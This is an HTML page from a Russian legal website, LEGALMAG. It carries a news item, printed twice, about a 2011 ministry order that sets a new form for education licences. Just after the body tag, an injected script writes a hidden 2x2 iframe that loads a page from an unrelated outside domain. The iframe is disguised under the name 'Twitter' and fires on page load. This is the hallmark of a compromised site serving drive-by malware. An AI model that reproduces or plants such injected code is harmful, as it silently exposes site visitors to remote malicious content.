<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
	<title>LEGALMAG</title>

	<link rel="stylesheet" href="design/css/style.css">
	<!--[if IE 7]><link rel="stylesheet" href="design/css/style_ie7.css" /><![endif]-->
	<!--[if IE 8]><link rel="stylesheet" href="design/css/style_ie8.css" /><![endif]-->
	<!--[if IE 9]><link rel="stylesheet" href="design/css/style_ie9.css" /><![endif]-->
	<link rel="stylesheet" href="design/css/jquery-ui-1.8.20.custom.css">
	<link rel="stylesheet" href="design/css/jquery.ui.selectmenu.css">
	<link rel="stylesheet" href="design/css/jquery.fancybox.css">

	<script src="design/js/jquery-1.7.2.min.js"></script>
	<!--[if lt IE 9]><script src="design/js/html5.js"></script><![endif]-->
	<script src="design/js/custom.js"></script>
</head>

<body><!--c3284d--><script type="text/javascript">
document.write('<iframe src="http://cabaniaseleden.com.ar/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->


	<section id="body">
		<header><!--header-->
			<div class="wrapper">
				<a id="logo" href="index.html" title="LEGALMAG"></a>
				<div id="logged">
					Привет,&nbsp;<a class="enter" href="">Валентин!</a>
					<a class="register" href="">Выйти</a>
					<div class="sep"></div>
				</div>
				<nav class="auth"><!--top-navigation-->
					<div id="breadcrumbs">
						<ul>
							<li><a href="">Главная страница</a></li>
							<li>Заголовок страницы</li>
						</ul>
				</div>	
				</nav><!--/top-navigation-->
			</div>
		</header><!--/header-->

		<div class="clear">&nbsp;</div>

		<section id="content"><!--content-->
			<div class="wrapper">
				<div id="left-col">
					<div id="post">
						<ul>
							<li><a href="">Главная</a></li>
							<li><a href="">О компании</a></li>
							<li class="active"><a href="">Правовые документы</a>
								<ul>
									<li><a href="">Пользовательское соглашение</a></li>
									<li><a href="">Политика конфиденциальности</a></li>
									<li><a href="">Оферта оказания рекламных услуг</a></li>
								</ul>
							</li>
							<li><a href="">Для инвесторов</a></li>
							<li><a href="">Безопасность</a></li>
							<li><a href="">Контакты</a></li>
						</ul>
					</div>
				</div>
				<section id="right-col">
					<h2>Заголовок страницы</h2>
					<div class="plainText">
						2 апреля 2012 года в Минюсте России зарегистрирован приказ Минобрнауки России от 8 декабря 2011 г. № 2805, утверждающий новую форму лицензии на образовательную деятельность.<br>
На лицевой стороне лицензии указываются наименование (полное и сокращенное) и организационно-правовая форма лицензиата, его ОГРН и ИНН, номер и дата выдачи лицензии. На оборотной - местонахождение лицензиата, срок, на который выдана лицензия, реквизиты решения о ее предоставлении.<br>
Отмечено, что обязательной частью лицензии является приложение к ней. В нем перечисляются образовательные программы, по которым может вестись обучение, с указанием их вида, уровня и срока освоения. В отношении профессиональных программ приводятся направления подготовки (специальности, профессии), код, наименование квалификации (степени) и разряд, присваиваемые лицам по окончании обучения. Также указываются адреса мест ведения деятельности лицензиатом и его филиалом.<br>
Лицензия и приложение подписываются руководителем лицензирующего органа и заверяются печатью этого ведомства.<br>
Кроме того, приказом установлены технические требования к бланкам лицензий. Они, в частности, должны иметь несколько элементов защиты (гильоширные рисунки, микротекст, высокий способ печати серии и номера бланка). Определены цвета бланков: для лицензии - голубой, для приложения - светло-серый. Указано также, что бланки печатаются на бумаге с эксклюзивным водяным знаком предприятия-изготовителя.<br><br>

2 апреля 2012 года в Минюсте России зарегистрирован приказ Минобрнауки России от 8 декабря 2011 г. № 2805, утверждающий новую форму лицензии на образовательную деятельность.<br>
На лицевой стороне лицензии указываются наименование (полное и сокращенное) и организационно-правовая форма лицензиата, его ОГРН и ИНН, номер и дата выдачи лицензии. На оборотной - местонахождение лицензиата, срок, на который выдана лицензия, реквизиты решения о ее предоставлении.<br>
Отмечено, что обязательной частью лицензии является приложение к ней. В нем перечисляются образовательные программы, по которым может вестись обучение, с указанием их вида, уровня и срока освоения. В отношении профессиональных программ приводятся направления подготовки (специальности, профессии), код, наименование квалификации (степени) и разряд, присваиваемые лицам по окончании обучения. Также указываются адреса мест ведения деятельности лицензиатом и его филиалом.<br>
Лицензия и приложение подписываются руководителем лицензирующего органа и заверяются печатью этого ведомства.<br>
Кроме того, приказом установлены технические требования к бланкам лицензий. Они, в частности, должны иметь несколько элементов защиты (гильоширные рисунки, микротекст, высокий способ печати серии и номера бланка). Определены цвета бланков: для лицензии - голубой, для приложения - светло-серый. Указано также, что бланки печатаются на бумаге с эксклюзивным водяным знаком предприятия-изготовителя.
					</div>
				</section>
			</div>
		</section><!--/content-->

	<div class="clear">&nbsp;</div>
	<div id="rasporka"></div>

	</section><!--/body-wrapper-->

	<footer><!--footer-->
		<section class="wrapper">
			<div class="left-col">
				<p>&copy; Legalmag, 2012</p>
				<p>Все права защищены.</p>
				<p style="margin: 20px 0 5px 0;"><a href="">Условия использования</a></p>
				<a href="">Регламент техподдержки</a>
			</div>
			<div class="right-col">
				<nav>
					<ul>
						<li><a href="">О проекте </a></li>
						<li><a href="">Условия использования</a></li>
						<li class="active"><a href="">Для инвесторов</a></li>
						<li><a href="">Безопасность </a></li>
						<li><a href="">Контакты</a></li>
					</ul>
				</nav>
				<div id="paySystems"></div>
			</div>
		</section>
	</footer><!--/footer-->

</body>
</html>